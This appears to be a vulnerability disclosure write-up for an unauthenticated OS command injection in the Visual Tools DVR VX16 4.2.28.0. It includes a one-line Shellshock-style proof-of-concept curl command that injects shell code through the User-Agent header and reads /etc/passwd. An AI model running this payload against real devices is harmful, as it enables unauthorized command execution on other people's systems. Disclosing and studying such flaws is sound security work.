During a routine penetration testing session for a client, I stumbled upon a severe security flaw within the software Visual Tools, a trademark of AX Solution LA (https://visual-tools.com).
Vendor Link to heading
The company designs and manufactures smart video surveillance products and people counting solutions for the professional market, sold under the Visual Tools brand. These products reach customers through an international distribution channel, which comprises a wide network of partners in more than 40 countries.
Technical Details Link to heading
- Vulnerability: OS Command Injection
- CVSSv3.1 Base Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
- CVSSv3.1 Base Score: 9.8 – Critical
In the following section, I will provide an in-depth technical analysis of this vulnerability, along with evidence and a proof-of-concept. This vulnerability poses a potential threat to hundreds of Internet-connected devices.
Description Link to heading
The Visual Tools DVR VX16 4.2.28.0 has a vulnerability that enables an unauthenticated attacker to execute remote commands via shell metacharacters in the cgi-bin/slogin/login.py User-Agent HTTP header. The attack can be launched remotely without any form of authentication.
Proof of Concept Link to heading
The following POC demonstrates how to execute system commands and gain a remote shell.
curl -H 'User-Agent: () { :; }; echo ; echo ; /bin/cat /etc/passwd' bash -s :'' http://DVR_ADDR:PORT/cgi-bin/slogin/login.py
Details about the DVR Link to heading
System Information Linux VSserver 2.6.35.4; i686 GNU/Linux Embedded Debian GNU 0.7 Bash GNU bash, version 3.2.39(1)-release(i486-pc-linux gnu)
Impact Link to heading
An attacker can potentially gain access to the remote system and execute arbitrary commands on the Linux-based system as an unprivileged user.
Mitigation Link to heading
To mitigate the risk of this vulnerability, I suggest not deploying the device directly on the internet. Instead, position the DVR behind a VPN connection.